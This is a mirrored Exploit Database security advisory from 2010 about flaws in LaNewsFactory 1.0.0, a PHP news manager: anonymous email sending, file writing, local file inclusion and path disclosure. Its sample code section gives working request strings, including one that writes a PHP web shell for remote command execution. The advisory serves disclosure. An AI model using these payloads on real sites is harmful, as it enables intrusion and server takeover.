lanewsfactory – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： Salvatore Fresta
  日期： 2010-04-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12361/

• LaNewsFactory Multiple Remote Vulnerabilities
  http://www.salvatorefresta.net/files/adv/LaNewsFactory%20Multiple%20Remote%20Vulnerabilities-19042010.txt
  
   NameLaNewsFactory
   VendorChristophe Brocas
   Versions Affected <= 1.0.0
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-04-19
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   VI. DISCLOSURE TIMELINE
   
  
  I. ABOUT THE APPLICATION
  
  Thisisavery usednews manager thatnot require a
  database.
  
  
  II. DESCRIPTION
  
  This news managment is affectedby manyvulnerabilities
  thatallowsaguesttowritearbitrary files on the
  system, include local files, read local files etc..
  
  
  III. ANALYSIS
  
  Summary:
  
   A) Anonymous email
   B) Remote File Writing
   C) Multiple Local File Inclusion
   D) Full Path Disclosure
  
  A) Anonymous email
  
  The mailto.php file allows a guest to send arbitrary emails.
  The input is not properly sanitised:
  
  if (ValidEmailAdress($youremail) and ValidEmailAdress($friendemail))
  {
  	mail ($friendemail, $display[$lang]["mailtoafriend"],"$comments\n\n".$url."print".$LNF_file_extension."?art=$newsfilename\n\n$yourname", "From: $youremail");
  
  
  B) Remote File Writing
  
  The save-edited-news.phpfileallows a guest to write a
  fileon thesystem.Thisvulnerability may be used to
  execute remote commands on the system.
  
  
  C) Multiple Local File Inclusion
  
  There are many files that use a not sanitised input with
  include PHP function. Thisvulnerabilitymay be used to
  execute remote commands by including the Apache Log file.
  
  
  D) Full Path Disclosure
  
  Forexample, print.phpfileprintsmanyerrorsby
  including the full path of the file.Thispathmaybe
  very useful for local file inclusion and other.
  
  
  
  IV. SAMPLE CODE
  
  A) Anonymous email
  
  	mailto.php?friendemail=target@email.com&youremail=ano@email.com&comments=suck!
  	
  	
  B) Remote File Writing to Remote Command Execution
  
  	save-edited-news.php?art=news/file.php&corps=<?php system($_GET[cmd]); ?>
  	
  	
  D) Full Path Disclosure
  
  	print.php?art=-1.xml
  
  
  V. FIX
  
  No fix.
  
  
  VIII. DISCLOSURE TIMELINE
  
  2010-04-19 Bugs discovered
  2010-04-19 Advisory released